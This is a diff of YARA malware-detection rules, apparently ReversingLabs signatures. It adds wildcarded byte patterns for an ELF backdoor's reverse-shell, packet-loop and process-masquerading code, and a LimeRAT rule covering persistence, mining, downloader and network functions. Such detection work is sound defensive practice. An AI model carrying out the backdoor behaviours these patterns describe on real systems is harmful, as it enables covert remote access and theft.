+            03 45 ?? 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 01 45 ?? 83 45 ?? ?? 8B 45
+            ?? 3B 45 ?? 7C ?? C7 45 ?? ?? ?? ?? ?? EB ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2
+            48 C1 E2 ?? 48 01 D0 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 01 45 ?? 83 45
+            ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 85 C0
+            75 ?? 48 8B 55 ?? 48 8B 05 ?? ?? ?? ?? 48 89 D1 48 29 C1 48 89 C8 48 89 C2 48 8B 05
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 05 ?? ?? ?? ??
+            48 89 D1 48 29 C1 48 89 C8 48 89 C2 48 8B 4D ?? 48 8B 05 ?? ?? ?? ?? 48 89 CE 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            B8 ?? ?? ?? ?? C9 C3
+        }
+		$packet_loop_v2_p1 = {
+            55 89 E5 57 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ??
+            66 C7 85 ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 0F B7 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C2 B8 ?? ??
+            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45
+            ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 0F B6 00 0F B6 C0 83 E0 ?? C1 E0 ??
+            89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 0F B6 40 ?? 0F B6 C0 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ??
+            EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B 45 ?? 8D 04 02 89 45 ?? 8B 45 ?? 0F B6 40 ?? 0F
+            B6 C0 25 ?? ?? ?? ?? C1 F8 ?? C1 E0 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B 45 ??
+            01 C2 8B 45 ?? 8D 04 02 89 45 ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 83 C0
+        }
+		$packet_loop_v2_p2 = {
+            89 45 ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 0F
+            84 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 83 F8 ?? 75 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? EB ?? 8B
+            45 ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+            85 9C FC FF FF 2F C6 85 9D FC FF FF 75 C6 85 9E FC FF FF 73 C6 85 9F FC FF FF 72 C6
+            85 A0 FC FF FF 2F C6 85 A1 FC FF FF 6C C6 85 A2 FC FF FF 69 C6 85 A3 FC FF FF 62 C6
+            85 A4 FC FF FF 65 C6 85 A5 FC FF FF 78 C6 85 A6 FC FF FF 65 C6 85 A7 FC FF FF 63 C6
+            85 A8 FC FF FF 2F C6 85 A9 FC FF FF 70 C6 85 AA FC FF FF 6F C6 85 AB FC FF FF 73 C6
+            85 AC FC FF FF 74 C6 85 AD FC FF FF 66 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 78 C6
+            85 B0 FC FF FF 2F C6 85 B1 FC FF FF 6D C6 85 B2 FC FF FF 61 C6 85 B3 FC FF FF 73 C6
+            85 B4 FC FF FF 74 C6 85 B5 FC FF FF 65 C6 85 B6 FC FF FF 72 C6 85 B7 FC FF FF ?? E8
+            ?? ?? ?? ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 8B BD ?? ?? ?? ?? F2 AE 89 C8 F7 D0 8D 50 ?? A1 ??
+            ?? ?? ?? 89 C7 FC 89 D1 B8 ?? ?? ?? ?? F3 AA 8B 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89
+        }
+		$packet_loop_v2_p3 = {
+            44 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC
+            8B BD ?? ?? ?? ?? F2 AE 89 C8 F7 D0 83 E8 ?? 89 C2 8B 45 ?? 83 C0 ?? C7 44 24 ?? ??
+            ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 8B BD ?? ?? ?? ?? F2 AE 89 C8 F7 D0 83 E8 ?? 89 C2 8B
+            45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
+            83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 04 24 E8
+            ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 0F B7 40
+            ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 0F B7 C0 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 83 F8 ?? 74 ?? 8B 45 ?? 8B 40 ?? 85
+            C0 74 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? 8B 45 ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? C7 00 ??
+            ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 0F B7
+            40 ?? 0F B7 C0 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 7E
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45
+        }
+		$reverse_shell_v2_p1 = {
+            8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ??
+            ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ??
+            E8 ?? ?? ?? ?? 85 C0 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B
+            45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44
+            24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F
+            85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ??
+            ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24
+        }
+		$reverse_shell_v2_p2 = {
+            E8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? FC F3 AB 89 4D
+            ?? 89 7D ?? A1 ?? ?? ?? ?? 89 C2 C1 EA ?? A1 ?? ?? ?? ?? 83 E0 ?? 0F AB 84 95 ?? ??
+            ?? ?? 8B 45 ?? 89 C2 C1 EA ?? 8B 45 ?? 83 E0 ?? 0F AB 84 95 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 3B 45 ?? 7E ?? A1 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ??
+            89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 85 C0
+            0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 C2 83 E2 ?? A1 ?? ?? ?? ?? C1 E8 ?? 0F A3 94 85
+            ?? ?? ?? ?? 0F 92 C0 84 C0 74 ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B
+            45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85
+            C0 0F 8E ?? ?? ?? ?? 8B 45 ?? 89 C2 83 E2 ?? 8B 45 ?? C1 E8 ?? 0F A3 94 85 ?? ?? ??
+            ?? 0F 92 C0 84 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8D 85 ?? ??
+            ?? ?? 29 C2 8B 45 ?? 29 D0 89 45 ?? 83 7D ?? ?? 7E ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ??
+            8D 85 ?? ?? ?? ?? 8B 55 ?? 89 C7 89 D6 FC F3 A4 83 7D ?? ?? 7F ?? B8 ?? ?? ?? ?? 89
+        }
+		$reverse_shell_v2_p3 = {
+            C1 2B 4D ?? 8B 45 ?? 89 C2 8D 85 ?? ?? ?? ?? 01 D0 89 4C 24 ?? 89 44 24 ?? 8B 45 ??
+            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66
+            89 85 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 66 0F B6 C0 89 C2 C1 E2 ?? 0F B6 85 ?? ?? ??
+            ?? 66 0F B6 C0 8D 04 02 66 89 85 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 66 0F B6 C0 89 C2
+            C1 E2 ?? 0F B6 85 ?? ?? ?? ?? 66 0F B6 C0 8D 04 02 66 89 85 ?? ?? ?? ?? 8B 15 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 85 ?? ?? ??
+            ?? 89 D1 29 C1 89 C8 8B 15 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89
+            14 24 E8 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 C2 03 55 ?? 8B 45 ?? 83 C0 ?? 89
+            D1 29 C1 89 C8 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 83 C2 ?? 8B
+            0D ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ?? 89 45 ?? E9 ?? ?? ??
+            ?? 8B 45 ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 89 14 24 E8 ?? ?? ??
+            ?? 85 C0 7E ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24
+            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? 5E 5F 5D C3
+        }
+		$set_process_name_v2_p1 = {
+            55 89 E5 57 56 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8B 45 ?? 8B 00 A3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 89
+            C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ??
+            F2 AE 89 C8 F7 D0 83 E8 ?? 03 45 ?? 83 C0 ?? 89 45 ?? 83 45 ?? ?? 8B 45 ?? C1 E0 ??
+            89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 85 C0 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89
+            45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89
+            45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 8D 48 ?? 8B 45 ?? C1 E0
+            ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 10 8B 45 ?? 89 C7 89 D6 FC F3 A4 8B 45 ?? C1 E0
+            ?? 89 C2 A1 ?? ?? ?? ?? 01 C2 8B 45 ?? 89 02 8B 5D ?? 83 C3 ?? 8B 45 ?? C1 E0 ?? 89
+            C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D
+        }
+		$set_process_name_v2_p2 = {
+            F2 AE 89 C8 F7 D0 83 E8 ?? 8D 04 03 89 45 ?? 83 45 ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 A1
+            ?? ?? ?? ?? 8D 04 02 8B 00 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? C7 45 ??
+            ?? ?? ?? ?? EB ?? 8B 55 ?? 83 C2 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 8B 00 B9 ?? ?? ?? ??
+            89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 8D 04 02 89 45 ?? 83
+            45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 5D ?? 83 C3 ?? 8B 45
+            ?? C1 E0 ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ??
+            ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 8D 04 03 89 45 ?? 83 45 ?? ?? 8B 45 ?? C1
+            E0 ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 85 C0 75 ?? 8B 55 ?? A1 ?? ?? ?? ?? 89 D1
+            29 C1 89 C8 89 C2 A1 ?? ?? ?? ?? 89 C7 FC 89 D1 B8 ?? ?? ?? ?? F3 AA 8B 55 ?? A1 ??
+            ?? ?? ?? 89 D7 29 C7 89 F8 8B 15 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 89 14
+            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 5B 5E 5F 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEP, OOO" and pe.signatures [ i ] . serial == "67:2d:44:28:45:0a:fc:c2:4f:c6:09:69:a5:06:3a:3e" and 1597381260 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $packet_loop_v1_p* ) ) and ( all of ( $reverse_shell_v1_p* ) ) and ( all of ( $set_process_name_v1_p* ) ) ) or ( ( all of ( $packet_loop_v2_p* ) ) and ( all of ( $reverse_shell_v2_p* ) ) and ( all of ( $set_process_name_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Df479E14A70C7970A4De3Dd3E4Bb0318 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Limerat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LimeRAT backdoor."
 		author = "ReversingLabs"
-		id = "465fc41c-920d-55e6-8616-a51d1f77b158"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c2ef6f27-3fb8-55f4-97a6-9e25a3d1ce49"
+		date = "2024-03-04"
+		modified = "2024-03-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4704-L4722"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.LimeRAT.yara#L1-L91"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "35b1f04cf5d5d1d89db537bf75737e3af5945e594f4d4231e9ae3e7fba52fc0d"
+		logic_hash = "03eaa2ac41950f036601222b32a28c03aae3b3445501e988e2f87e231a1a1522"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "LimeRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$persistence_mechanism = {
+            02 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 2B ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? DE
+        }
+		$crypto_miner = {
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 16 31 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 0B 07 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ??
+            ?? ?? 74 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 0A DE ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09
+            6F ?? ?? ?? ?? DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ??
+            0A DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 06
+        }
+		$downloader = {
+            73 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2C ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 7E ?? ?? ?? ?? 07 6F ??
+            ?? ?? ?? 07 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ??
+            06 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 26 00 06 6F ?? ?? ?? ?? 14 0A
+            DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? DE ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ??
+            ?? ?? DE
+        }
+		$network_communication_p1 = {
+            16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0B 28 ?? ??
+            ?? ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ??
+            ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ??
+            DE ?? 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 6F ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 15 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 14 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ??
+            25 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 14 14 14 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 9A 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 26 11
+            ?? 73 ?? ?? ?? ?? 17 11 ?? 8E 69 6F ?? ?? ?? ?? 9A 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C
+            ?? 11 ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 17 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 ??
+            ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 28 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2
+        }
+		$network_communication_p2 = {
+            25 1A 28 ?? ?? ?? ?? A2 25 1B 7E ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 7E ??
+            ?? ?? ?? A2 25 1E 28 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ??
+            ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ??
+            A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2
+            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25
+            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? 8C ?? ??
+            ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ??
+            ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
+            A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
+            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2B ?? 7E
+        }
+
 	condition:
